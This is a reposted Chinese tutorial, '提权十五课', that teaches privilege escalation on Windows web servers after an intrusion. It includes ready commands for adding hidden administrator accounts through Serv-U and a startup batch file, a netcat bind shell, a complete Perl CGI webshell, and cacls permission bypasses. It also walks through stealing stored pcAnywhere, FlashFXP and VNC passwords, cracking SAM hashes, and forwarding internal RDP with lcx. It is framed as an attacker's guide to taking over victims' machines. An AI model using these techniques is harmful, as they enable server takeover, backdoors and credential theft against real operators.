提权十五课(转载)

第一课 提权概述

测试环境：Windows xp 系统

1 了解什么是提权？

通常是 匿名权限（ASP）

   ASP.NET USER权限

入侵获得webshell并不完美，完美的是获得服务器的权限。

第一
如果服务器上有装了pcanywhere服务端，管理员为了管理方便 123 123 IP
也给了我们方便，到系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地
破解就使用pcanywhere连接就ok了


第二
有很多小黑问我这么把webshell的iis user权限提升
一般服务器的管理都是本机设计完毕然后上传到空间里，
那么就会用到ftp，服务器使用最多的就是servu   IIS
那么我们就利用servu来提升权限
通过servu提升权限需要servu安装目录可写～
好开始把，首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载
下来，然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖，
启动servu添加了一个用户，设置为系统管理员，目录C:/，具有可执行权限
然后去servu安装目录里把ServUDaemon.ini更换服务器上的。

用我新建的用户和密码连接～
好的，还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //刚才添加的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe
文件加用户。


第三
就是先检查有什么系统服务，或者随系统启动自动启动的程序和管理员经常使用的软件，
比如诺顿，VAdministrator，金山，瑞星,WinRAR甚至QQ之类的，是否可以写，
如果可以就修改其程序， 绑定一个批处理或者VBS，然后还是等待服务器重启。

第四
查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码，可能会有所
收获等等。

第五
使用Flashfxp也能提升权限，但是成功率就看你自己的运气了
首先找到FlashFXP文件夹，打开(编辑)Sites. dat，这个文件这是什么东西密码和用户名，
而且密码是加了密的。 如果我把这些文件copy回本地也就是我的计算机中，替换我本地的相应文件。
然后会发现 打开flashfxp在站点中打开站点管理器一样。又可以添加N多肉鸡啦～～嘻嘻～

唔？？不对啊，是来提升权限的啊，晕，接着来别半途而废。
大家看看对方管理员的这站点管理器，有用户名和密码，密码是星号的。经过用xp星号密码 查看器查看，
然后和Sites.dat中加密了密码做比较发现并未加密而是查到的密码是明文显示， 然后最终把这个网站管理员的密码从这堆东西中找
出来。那么下一步就可以链接这些新的服务器啦～～
经过测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地
还原对方管理员的各个站点的密码。
****************************************************************************
第六

WIN2K+IIS5.0默认情况下应用程序保护选项是"中（共用的）"，这时IIS加载isapi是用的
iwam_computername用户身份执行。
但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5 、
win2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名，并且没有做目录限制，
以SYSTEM权限加载的isapi有：
1、 idq.dll
2、 httpext.dll
3、 httpodbc.dll
4、 ssinc.dll
5、 msw3prt.dll
6、 author.dll
7、 admin.dll
8、 shtml.dll
9、 sspifilt.dll
10、compfilt.dll
11、pwsdata.dll
12、md5filt.dll
13、fpexedll.dll

所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug，
比如请求/scripts/test%81%5cssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双字节的远东版问题。
ssinc.dll在处理包含文件路径的时候也有一个问题，就是"/"、"/"只识别了一个 "/"，所以如果请求里面使用"/"，
就会错误的处理包含文件路径，有可能泄露东西或者出现权限 漏洞，这种漏洞很多别的地方（ php、asp等）也还存在。

加载这些isapi不是单以文件名做依据了，而是加了路径，应该是修正了此问题。
一般默认情况下是：
1、 idq.dll d:/winnt/system32/idq.dll
2、 httpext.dll d:/winnt/system32/inetsrv/httpext.dll
3、 httpodbc.dll d:/winnt/system32/inetsrv/httpodbc.dll
4、 ssinc.dll d:/winnt/system32/inrtsrv/ssinc.dll
5、 msw3prt.dll d:/winnt/system32/msw3prt.dll
6、 author.dll D:/Program Files/Common Files/Microsoft Shared/web server extensions/40/isapi/_vti_aut/author.dll
7、 admin.dll D:/Program Files/Common Files/Microsoft Shared/web server extensions/40/isapi/_vti_adm/admin.dll
8、 shtml.dll D:/Program Files/Common Files/Microsoft Shared/web server extensions/40/isapi/shtml.dll
9、 sspifilt.dll d:/winnt/system32/inetsrv/sspifilt.dll
10、compfilt.dll d:/winnt/system32/inetsrv/compfilt.dll
11、pwsdata.dll d:/winnt/system32/inetsrv/pwsdata.dll
12、md5filt.dll d:/winnt/system32/inetsrv/md5filt.dll
13、fpexedll.dll D:/Program Files/Common Files/Microsoft Shared/web server extensions/40/bin/fpexedll.dll

正常情况下这些路径都guest不能写,但如果配置不好，这些路径iis user能够写了就一样可以提升权限了

可以把ISAPIHack.dll上传到IIS的可执行目录，文件名可叫ssinc.dll或者admin.dll等（上面列的13个文件名之一）。
然后等待IIS重启加载此dll，就可以获得权限了
****************************************************************************
第七

下载系统的 %windir%/repair/sam.*（WinNT 4下是sam._ 而Windows 2000下是sam）文件，
然后用L0pht等软件进行破解，只要能拿到，肯花时间，就一定可以破解。
****************************************************************************
第八
PipeUpAdmin（Windows 2000下）, 在本机运行可以把当前用户帐号加入管理员组。普通用户和Guests组用户都可以成功运行。
****************************************************************************
第九
Serv-u Ftp Server 本地权限提升漏洞：
很多主机的C:/Documents and Settings/All Users/ Documents目录以及下边几个子目录Documents没有设置权限，
导致可以在这个目录上传并运行Exp. 直接上传了serv-u local exploit 和nc,
并且把serv-u的本地提升权限的名字命名为su.exe 文件就放在C:/Documents and Settings/All Users/ Documents,
然后我们用su.exe直接建立用户,也可以反弹一个shell过来的。
具体命令：
建立用户: serv-u.exe "cmd"
>USER xl
>PASS 111111

反弹shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

很不错的提权新方法







第二课 serv-u服务器提权（目录无修改权限）

serv-u 是一款常见用于搭建网站的软件，但也存在不少漏洞。
这点让入侵者有机会入侵。


1 首先服务器必须要有安装serv-u安装

2 满足条件才能成功提权获服务器权限

3 使用webshell自带提权功能，提权

cmd /c net user hxhack$ dandan123 /add & net localgroup administrators hxhack$ /add

然后用建立的用户进行3389远程桌面连接。






第三课 serv-u服务器提权（目录有修改权限）

1理解ServUDaemon.ini文件的字段意思

2修改ServUDaemon.ini文件

3执行程序，获得权限

======================
ServUDaemon.ini配置文件详解
======================

[USER=honker|1]    //用户名
Password=gn3436a2a7150feb9edf0151aec2bcbde2    //用户密码加密后的密文
HomeDir=c:/   //默认根目录
TimeOut=600 //超时时间设置
Maintenance=System //权限
Access1=C:/|RWAMELCDP   //可访问的目录及权限
Access2=d:/|RWAMELCDP   //可访问的目录及权限
Access3=e:/|RWAMELCDP   //可访问的目录及权限

Quote site exec net user 4567 4567 /add
quote site exec net localgroup administrators 4567 /add

提示：200 EXEC command successful (TID=33).

mstsc

"C:/Program Files/RhinoSoft.com/Serv-U/ServUAdmin.exe"
---------------------------------------------------------

[USER=hx95|1]
Password=gn3436a2a7150feb9edf0151aec2bcbde2
HomeDir=c:/
TimeOut=600
Maintenance=System
Access1=C:/|RWAMELCDP
Access2=d:/|RWAMELCDP
Access3=e:/|RWAMELCDP







第四课 pcanywhere提权方法

测试环境：Windows xp 系统

===================
Pcanywhere软件介绍：
===================

这是一款老牌的计算机远程控制软件，功能强大。通过pcAnywhere，管理员可以用自己的计算机登录其他计算机的游戏账号，大大降低丢号的风险。强烈推荐游戏工作室使用！pcAnywhere的使用方法并不复杂，下面将为您详细介绍，稍有计算机操作经验的人都可以轻松掌握。

我们把管理员的计算机称为主控端，员工的计算机称为被控端。主控端和被控端需要分别安装pcAnywhere软件，然后通过pcAnywhere界面，管理员可以在自己的计算机上操作员工的计算机，这就是pcAnywhere的基本原理。

=====================
获得管理密码的方法：
=====================

利用工具破解*.cif文件


1 个人电脑和服务器需要安装

2 服务器启动




第五课 FlashFXP替换文件提权



测试环境：Windows xp 系统

提权思路：利用FlashFXP替换文件漏洞，可以读取管理员连接过的站点帐户密码信息

思路扩展：通过社会工程学猜测其他的密码同样如此，借此机会扩大权限

收集密码，利用社会工程学，进一步利用，猜测。
-----------
FlashFXP是功能强大的FXP/FTP软件，融合了一些其他优秀FTP软件的优点，如像CuteFTP一样可以比较文件夹，支持彩色文字显示；像BpFTP支持多文件夹选择文件，能够缓存文件夹；像LeapFTP一样的外观界面，甚至设计思路也差相仿佛。支持文件夹 (带子文件夹)的文件传送、删除；支持上传、下载及第三方文件续传；可以跳过指定的文件类型，只传送需要的文件；可以自定义不同文件类型的显示颜色；可以缓存远端文件夹列表，支持FTP代理及Socks 4&5；具有避免空闲功能，防止被站点踢出；可以显示或隐藏“隐藏”属性的文件、文件夹；支持每个站点使用被动模式等。


-------------

问：FlashFXP中的“FXP”是什么意思？
　　答：FXP是指在两台服务之间的直线传输。也可以称为“站到站传输”（Site to Site Transfers）。
FXP过程需要服务两台服务器均支持方可进行。它利用服务器之间的高速连接，实现文件的高效传输，几乎不会占用本机的带宽资源。

问：FlashFXP的不足。
　　答：FlashFXP无法像CuteFTP那样实现的多窗功能，CuteFTP可在一个窗口中打开多个站点。此外，FlashFXP尚不支持多进程传输，所有的下载和上传任务均是以单线程进行。

需要下载的文件：
quick.dat
sites.dat
stats.dat

将以上文件替换本地ftp发现连接时出现密码。这是用密码查看器查看可以破解密码


。







第六课 VNC密码破解提权


测试环境：Windows xp 系统


==============
VNC介绍
==============
VNC（Virtual Network Computing，虚拟网络计算）最早是一套由英国剑桥大学ATT实验室在2002年开发的轻量型的远程控制计算机软件，其采用了 GPL 授权条款，任何人都可免费取得该软件。VNC软件主要由两个部分组成：VNC server及VNC viewer。用户需先将VNC server安装在被控端的计算机上后，才能在主控端执行 VNC viewer 控制被控端。
VNC server 与 VNC viewer 支持多种操作系统，如 windows，Linux，MacOS 及 Unix 系列（Unix，Solaris等），因此可将 VNC server 及 VNC viewer 分别安装在不同的操作系统中进行控制。RealVNC 的优越性还在于如果操作系统的主控端计算机没有安装 VNC viewer，也可以通过一般的网络浏览器（如 IE 等）来控制被控端（需要 Java 虚拟机的支持）。

==============
VNC的运行过程
==============
整个 VNC 一般运行的工作流程如下：
（1） VNC 客户端通过浏览器或 VNC Viewer 连接至 VNC Server。
（2） VNC Server 传送一对话窗口至客户端，要求输入连接密码（可能为空），以及存取的 VNC Server 显示装置。
（3） 在客户端输入连接密码后，VNC Server 验证客户端是否具有存取权限。
（4） 若是客户端通过 VNC Server 的验证，客户端即要求 VNC Server 显示桌面环境。
（5） 被控端将画面显示控制权交由 VNC Server 负责。
（6） VNC Server 将把被控端的桌面环境利用 VNC 通信协议送至客户端，并且允许客户端控制 VNC Server 的桌面环境及输入装置。

==============
VNC提权方法
==============
利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解
注册表位置：HKEY_LOCAL_MACHINE/SOFTWARE/RealVNC/WinVNC4/password


69 45
150 96
177 b1
243 f3
153 99
89 59
148 94
22 16

十六进制转换成十进制。。。

在用工具破解。


第八课 替换服务提权


测试环境：Windows xp 系统


权限情况:   通常我们入侵一个服务器都是获得了一个webshell，
但是只要稍微有一点经验的管理员都知道，
ASP运行的权限是非常底的
(在这个地方是指我们的服务器的每个磁盘的分区格式必须是NTFS分区)因为只有NTFS分区才可能具有权限管理的功能。

但是在很多情况下，我们仍然可以遇到这样的情况：服务器管理员由于各种原因，
并没有把服务器的各个磁盘的格式设置为NTFS，而且是FAT32格式，也就是说服务器没有权限的限制，
那么再近一步就是说 我们可以任意的控制任何一个磁盘（包括可以上传文件、删除文件、替换文件）
那么大家一定马上可以想到，在服务器的“启动”项里面是不是都是以SYSTEM权限启动的？OK，对了，那么我们就可以

-----替换服务

使用工具：自己的木马，或者后门等(只要可以达到控制服务器的目的就可以)

提权思路：既然服务器的各个磁盘没有任何的权限限制，那么我们就可以替换任意文件，既然这样，我们几乎一定等于控制了整个服务器

思路扩展：其实如果对方的服务器没有采用NFTS+磁盘权限管理，我们就可以对任何文件都具有运行的权利，那么我们上传一个sniffer上去，或者上传一个键盘记录上去，也不是不可以，更多的思路期待大家去大胆的想象~~  








第九课 利用HASH破解提权


测试环境：Windows xp 系统


使用工具：SAMinside、LC5、

提权思路：利用SAMinside软件的抓取系统用户HASH值，然后使用LC5进行破解

思路扩展：本次提权主要是运用在针对大型服务器集群或者是同一个管理员管理的机房，利用了社会工程学的原理在里面，因为一般同一个管
理员管理的服务器都是同一个密码。

其实还可以想象到其他很多方法，比如：在管理员的登陆入口写入代码，抓取管理员的各种敏感信息。2、在服务器上挂马，让管理员使用的PC
机中马，然后就可以获得非常多的管理员常用密码信息，其实还有很多，大家可以充分发挥想象能力



提权步骤：

1、使用SAMinside抓取服务器HASH

2、导出为txt文件

3、使用LC5进行HASH破解




第十课 启动项提权


测试环境：Windows xp 系统

1 建立一个文本，文本内容输入
@echo off
net user xixi 123456 /add
net localgroup administrators xixi /add
然后改名字为add.bat

2 利用webshell把建立好的add.bat放到启动项里。
   只要管理员重新启动计算机后，就会执行我们的add.bat文件。

   这样一来，就建立了一个用户


第十一课 CAcls命令在提权中的使用


课程主要内容：利用webshell的cmd命令执行功能，使用cacls命令，修改服务器磁盘、文件夹或NET.EXE为最低权限，提升权限。
关键技术要点：cacls命令详细使用方法。

随着管理员的对服务器的熟悉和黑客入侵的过程越来越了解,相应的就在入侵的关键点上设置了障碍,这些障碍的投置有些比较简单,
是可以被绕过的,比如管理员很喜欢作的一件事是把首页文件设置没对IUSER_用户没有写权限,
用来防止被挂木马或者将NET.EXE,FTP.EXE等工具设置不给于IUSER用户使用权限,让我们无法用NET USER建帐号或FTP进行下载,
我们可以利用Cacls 修改权限后再正常使用,

cacls是windows自带的一个权限修改工具,它是在命令行下运行的,能很方便的修改文件或目录的权限,
cacls成功的条件是要修改的文件允他的主要运行参数如下/

Cacls filename [/T] [/E] [/C] [/G usererm] [/R user [...]] [/P usererm [...]] [/D user [...]]

Filename：显示访问控制列表(以下简称ACL)

/T：更改当前目录及其所有子目录中指定文件的ACL

/E：编辑ACL而不替换

/C：在出现拒绝访问错误时继续 　　

/G Userer:perm：赋予指定用户访问权限，Perm代表不同级别的访问权限，其值可以是R(读取)、W(写入)、C(更改，写入)、F(完全控制)等。

/R user：撤销指定用户的访问权限，注意该参数仅在与“/E”一起使用时有效。

/P user：perm：替换指定用户的访问权限，perm的含义同前，但增加了“N(无)”的选项。

/D user：拒绝指定用户的访问
假设欲修改CMD.EXE的权限 执行cacls E:/index.asp /t /e /c /g interactive:f


给把CMD的完全控制权限给予了interactive组成员(IIS访问用户IUSER_机器名就在这一组中).这时通过CMD可以正常使用了

要修改一个文件的权限的必要条件:

要有USERS组的完全控制权限

CMD权限



第十二课 Windows-2003-webshell默认权限


课程主要内容：详细讲解在iis默认配置和典型配置下的webshell权限，
包括读、写、执行权限，已经扩展权限：fso、运行cmd、rwirte权限等。讲解权限提升概念。
关键技术要点：典型配置下的webshell可使用权限；提权概念。


默认设置

首要区别！ 默认在WINDOWS2003下是没有安装IIS的


?默认只安装静态HTTP服务器
IIS 6.0的默认安装被设置为仅安装静态HTML页面显示所需的组件，而不允许动态内容。


?增强的文件访问控制
　　匿名帐号不再具有web服务器根目录的写权限。另外，
FTP用户也被相互隔离在他们自己的根目录中。这些限制有效的避免了用户向服务器文件系统的其他部分上传一些有害程序。
例如攻击者可以向scripts目录上传一些有害的可执行代码，并远程执行这些代码，从而攻击web站点

父目录被禁用
　　IIS 6.0中默认禁用了对父目录的访问。这样可以避免攻击者跨越web站点的目录结构，访问服务器上的其他敏感文件，
如SAM文件等。当然也请注意，由于父目录默认被禁用，这可能导致一些从早期版本IIS上迁移过来的应用由于无法使用父目录而出错。


坚持最小特权原则
　　IIS 6.0坚持一个基本安全原则--最小特权原则。也就是说，HTTP.sys中所有代码都是以Local System权限执行的，
而所有的工作进程，都是以Network Service的权限执行的。Network Service是Windows 2003中新内置的一个被严格限制的账号。
另外，IIS 6.0只允许管理员执行命令行工具，从而避免命令行工具的恶意使用。
这些设计上的改变，都降低了通过潜在的漏洞攻击服务器的可能性。部分基础设计上的改变、
一些简单配置的更改（包括取消匿名用户向web服务器的根目录写入权限，
和将FTP用户的访问隔离在他们各自的主目录中）都极大地提高了IIS 6.0的安全性。


典型配置的权限


１、磁盘权限
　　系统盘及所有磁盘只给 Administrators 组和 SYSTEM 的完全控制权限
　　系统盘Documents and Settings 目录只给 Administrators 组和 SYSTEM 的完全控制权限
　　系统盘Documents and SettingsAll Users 目录只给 Administrators 组和 SYSTEM 的完全控制权限
　　系统盘Inetpub 目录及下面所有目录、文件只给 Administrators 组和 SYSTEM 的完全控制权限
　　系统盘Windows/System32/cacls.exe、cmd.exe、net.exe、net1.exe 文件只给 Administrators 组和 SYSTEM 的完全控制权限

2．不使用默认的Web站点，如果使用也要将IIS目录与系统磁盘分开

IIS默认创建的Inetpub目录被删除（在安装系统的盘上）

3．每个独立的要保护的个体（比如一个网站或者一个虚拟目录）创建一个系统用户，让这个站点在系统中具有惟一的可以设置权限的身份

在典型的WEBSEHLL下，对于本站具有，读，写，修改，权限，目录下拥有相对的执行权限.









第十三课 Windows 2003服务器默认文件夹权限


课程主要内容：详细讲解Windows 2003服务器默认文件夹权限，
重点讲解系统盘所在文件夹默认权限和iis所在文件夹权限设置。
详细讲解文件夹属性中的只读、系统、隐藏属性，详细讲解文件夹的权限继承、非继承、扩展权限。
关键技术要点：windows 2003所有系统文件夹默认权限。


Windows目录的权限：



(1) 完全控制

“完全控制”就是对目录拥有不受限制的完全访问。地位就像Administrators在所有组中的地位一样。
选中了“完全控制”，下面的五项属性将被自动被选中。

(2) 修改

“修改”则像Power users，选中了“修改”，下面的四项属性将被自动被选中。下面的任何一项没有被选中时，
“修改”条件将不再成立。

(3) 读取和运行

“读取和运行”就是允许读取和运行在目录下的任何文件，“列出文件夹目录”和“读取”是“读取和运行”的必要条件。

(4) 列出文件夹目录

“列出文件夹目录”是指只能浏览该卷或目录下的子目录，不能读取，也不能运行。

(5) 读取

“读取”是能够读取该卷或目录下的数据。

(6) 写入

“写入”就是能往该卷或目录下写入数据。

(7) 特别的权限。

而“特别”则是对以上的六种权限进行了细分。

3. 权限的四个特性——继承性、累加性 、优先性、交叉性

三种文件和文件夹属性

只读：顾名思义，只能读，不能修改

系统：被隐藏保护通常不会显示

隐藏：隐藏不显示

.系统盘权限设置
c:/
administrators 全部（该文件夹，子文件夹及文件）
CREATOR OWNER   全部（只有子文件来及文件）
system 全部（该文件夹，子文件夹及文件）
IIS_WPG 创建文件/写入数据（只有该文件夹）
IIS_WPG（该文件夹，子文件夹及文件）
遍历文件夹/运行文件
列出文件夹/读取数据
读取属性
创建文件夹/附加数据
读取权限
c:/Documents and Settings
administrators 全部（该文件夹，子文件夹及文件）
Power Users （该文件夹，子文件夹及文件）
读取和运行
列出文件夹目录
读取
SYSTEM全部（该文件夹，子文件夹及文件）
C:/Program Files
administrators 全部（该文件夹，子文件夹及文件）
CREATOR OWNER全部（只有子文件来及文件）
IIS_WPG （该文件夹，子文件夹及文件）
读取和运行
列出文件夹目录
读取
Power Users（该文件夹，子文件夹及文件）
修改权限
SYSTEM全部（该文件夹，子文件夹及文件）
TERMINAL SERVER USER （该文件夹，子文件夹及文件）
修改权限


最后，文件夹的权限继承、非继承、扩展权限



第十四课 利用perl提升权限


课程主要内容：通过webshell，询找PERL默认目录，利用目录权限漏洞实现权限提升。
关键技术要点:学会使用PERL的SHELL。

什么是 Perl ？
　　Perl 就是 Practical Extraction and Reporting Language 的简称，是一种最广泛应用于语法分析和 World Wide Web 的编程语言。

它起源于 awk、C、sh 和 sed 语言，然而，它的应用开发远比其他任何一种面向对象编程语言更加容易。
　　Perl 语言由 Larry Wall 创建，最初作为一种实用解释语言。
其主要功能最初是用于分析基于文本的数据和生成这些数据的统计或结果。
随着 Internet 的普及推广，我们已经感受到 Perl 在 CGI 编程和处理格式数据上的强大功能。
由于 Perl 对 process、文档和文字有很强的处理、变换能力，因此凡是有关快速原型设计、
系统工具、软件工具、系统管理、资料库连结、图像程式设计、网络连结和 WWW 程式设计等之类的任务，都特别适合用 Perl 来完成


c:/prel，有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell放到PERL目录下的BIN目中
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html/r/n/r/n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2fig;
$execthis = $_;
syswrite(STDOUT, "
/r/n", 13);open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";system($execthis);syswrite(STDOUT, "/r/n/r/n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cmd.pl上传至BIN目录执行,
(如果不能运行，可以试试改为cgi 扩展呢，把刚才的 pl文件改为 cgi文件)
在IE浏览窗口中提交提交 http://anyhost//cmd.pl?dir 即可开始执行命令,请注意这个SHELL是具有ADMIN权限的,
能够添加帐号并加入管理员组,书写规则是在?后加入你需要执行的命令.

为什么安装PERL能导至黑客在服务器上提升权限呢?原理很简单,
因为PERL在默认安装时BIN目录是具有EVERYONE的完全控制权限和CGI执行权限的,所以能执行任意命令,这是一个NTFS权限导至的提权漏洞.



第十五课 端口映射解决内网提权


首先在自己机子的cmd下运行
lcx.exe -listen 51 3389
意思是监听51端口并转发到3389端口
然后在肉鸡上运行 lcx.exe路径 -slave 你的IP 51 肉机IP 1433
意思是 把肉机的3389端口 转发到 自己的IP 51端口上

提权思路：利用webshell执行lcx，实现端口发。

lcx.exe -slave 127.0.0.1 51 192.168.79.130 3389


然后远程连接127.0.0.1输入账号密码
192.168.0.100